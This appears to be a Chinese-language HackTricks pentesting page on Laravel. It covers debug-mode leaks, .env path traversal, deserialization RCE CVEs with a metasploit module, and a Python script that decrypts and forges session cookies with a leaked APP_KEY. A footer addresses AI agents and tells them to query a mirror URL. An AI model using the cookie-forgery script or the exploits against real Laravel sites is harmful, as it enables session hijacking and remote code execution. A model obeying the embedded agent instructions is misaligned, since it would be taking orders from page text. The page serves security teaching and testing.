# Laravel
从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS Red Team Expert) * 您在**网络安全公司**工作吗? 想要看到您的**公司在HackTricks中做广告**? 或者想要访问**PEASS的最新版本或下载PDF格式的HackTricks**? 请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! * 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs收藏品**](https://opensea.io/collection/the-peass-family) * 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com) * **加入** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我的**Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**。** * **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks)**和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud)**提交PR来分享您的黑客技巧**。
## Laravel技巧 ### 调试模式 如果Laravel处于**调试模式**,您将能够访问**代码**和**敏感数据**。\ 例如 `http://127.0.0.1:8000/profiles`: ![](/files/W9iY2Y0vioIne6kzaKEy) 这通常用于利用其他Laravel RCE CVEs。 ### .env Laravel将用于加密cookie和其他凭据的APP保存在名为`.env`的文件中,可以通过一些路径遍历在`/../.env`下访问。 Laravel还将在调试页面中显示此信息(当Laravel发现错误并激活时会出现)。 使用Laravel的秘密APP\_KEY,您可以解密和重新加密cookie: ### 解密Cookie ```python import os import json import hashlib import sys import hmac import base64 import string import requests from Crypto.Cipher import AES from phpserialize import loads, dumps #https://gist.github.com/bluetechy/5580fab27510906711a2775f3c4f5ce3 def mcrypt_decrypt(value, iv): global key AES.key_size = [len(key)] crypt_object = AES.new(key=key, mode=AES.MODE_CBC, IV=iv) return crypt_object.decrypt(value) def mcrypt_encrypt(value, iv): global key AES.key_size = [len(key)] crypt_object = AES.new(key=key, mode=AES.MODE_CBC, IV=iv) return crypt_object.encrypt(value) def decrypt(bstring): global key dic = json.loads(base64.b64decode(bstring).decode()) mac = dic['mac'] value = bytes(dic['value'], 'utf-8') iv = bytes(dic['iv'], 'utf-8') if mac == hmac.new(key, iv+value, hashlib.sha256).hexdigest(): return mcrypt_decrypt(base64.b64decode(value), base64.b64decode(iv)) #return loads(mcrypt_decrypt(base64.b64decode(value), base64.b64decode(iv))).decode() return '' def encrypt(string): global key iv = os.urandom(16) #string = dumps(string) padding = 16 - len(string) % 16 string += bytes(chr(padding) * padding, 'utf-8') value = base64.b64encode(mcrypt_encrypt(string, iv)) iv = base64.b64encode(iv) mac = hmac.new(key, iv+value, hashlib.sha256).hexdigest() dic = {'iv': iv.decode(), 'value': value.decode(), 'mac': mac} return base64.b64encode(bytes(json.dumps(dic), 'utf-8')) app_key ='HyfSfw6tOF92gKtVaLaLO4053ArgEf7Ze0ndz0v487k=' key = base64.b64decode(app_key) decrypt('eyJpdiI6ImJ3TzlNRjV6bXFyVjJTdWZhK3JRZ1E9PSIsInZhbHVlIjoiQ3kxVDIwWkRFOE1sXC9iUUxjQ2IxSGx1V3MwS1BBXC9KUUVrTklReit0V2k3TkMxWXZJUE02cFZEeERLQU1PV1gxVForYkd1dWNhY3lpb2Nmb0J6YlNZR28rVmk1QUVJS3YwS3doTXVHSlhcL1JGY0t6YzhaaGNHR1duSktIdjF1elwvNXhrd1Q4SVlXMzBrbTV0MWk5MXFkSmQrMDJMK2F4cFRkV0xlQ0REVU1RTW5TNVMrNXRybW9rdFB4VitTcGQ0QlVlR3Vwam1IdERmaDRiMjBQS05VXC90SzhDMUVLbjdmdkUyMnQyUGtadDJHSEIyQm95SVQxQzdWXC9JNWZKXC9VZHI4Sll4Y3ErVjdLbXplTW4yK25pTGxMUEtpZVRIR090RlF0SHVkM0VaWU8yODhtaTRXcVErdUlhYzh4OXNacXJrVytqd1hjQ3FMaDhWeG5NMXFxVXB1b2V2QVFIeFwvakRsd1pUY0h6UUR6Q0UrcktDa3lFOENIeFR0bXIrbWxOM1FJaVpsTWZkSCtFcmd3aXVMZVRKYXl0RXN3cG5EMitnanJyV0xkU0E3SEUrbU0rUjlENU9YMFE0eTRhUzAyeEJwUTFsU1JvQ3d3UnIyaEJiOHA1Wmw1dz09IiwibWFjIjoiNmMzODEzZTk4MGRhZWVhMmFhMDI4MWQzMmRkNjgwNTVkMzUxMmY1NGVmZWUzOWU4ZTJhNjBiMGI5Mjg2NzVlNSJ9') #b'{"data":"a:6:{s:6:\\"_token\\";s:40:\\"vYzY0IdalD2ZC7v9yopWlnnYnCB2NkCXPbzfQ3MV\\";s:8:\\"username\\";s:8:\\"guestc32\\";s:5:\\"order\\";s:2:\\"id\\";s:9:\\"direction\\";s:4:\\"desc\\";s:6:\\"_flash\\";a:2:{s:3:\\"old\\";a:0:{}s:3:\\"new\\";a:0:{}}s:9:\\"_previous\\";a:1:{s:3:\\"url\\";s:38:\\"http:\\/\\/206.189.25.23:31031\\/api\\/configs\\";}}","expires":1605140631}\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e' encrypt(b'{"data":"a:6:{s:6:\\"_token\\";s:40:\\"RYB6adMfWWTSNXaDfEw74ADcfMGIFC2SwepVOiUw\\";s:8:\\"username\\";s:8:\\"guest60e\\";s:5:\\"order\\";s:8:\\"lolololo\\";s:9:\\"direction\\";s:4:\\"desc\\";s:6:\\"_flash\\";a:2:{s:3:\\"old\\";a:0:{}s:3:\\"new\\";a:0:{}}s:9:\\"_previous\\";a:1:{s:3:\\"url\\";s:38:\\"http:\\/\\/206.189.25.23:31031\\/api\\/configs\\";}}","expires":1605141157}') ``` ### Laravel反序列化RCE 受影响版本:5.5.40和5.6.x至5.6.29 () 在这里你可以找到有关反序列化漏洞的信息: 你可以使用进行测试和利用\ 或者你也可以使用metasploit进行利用:`use unix/http/laravel_token_unserialize_exec` ### CVE-2021-3129 另一个反序列化漏洞: ### Laravel SQL注入 阅读有关此内容的信息:
从零开始学习AWS黑客技术,成为专家 htARTE (HackTricks AWS Red Team Expert) * 你在**网络安全公司**工作吗?想要在**HackTricks中看到你的公司广告**?或者想要访问**PEASS的最新版本或下载PDF格式的HackTricks**?查看[**订阅计划**](https://github.com/sponsors/carlospolop)! * 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFT收藏品](https://opensea.io/collection/the-peass-family) * 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) * **加入** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**。** * **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks)**和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud)**提交PR来分享你的黑客技巧**。
--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://hacktricks.xsx.tw/network-services-pentesting/pentesting-web/laravel.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.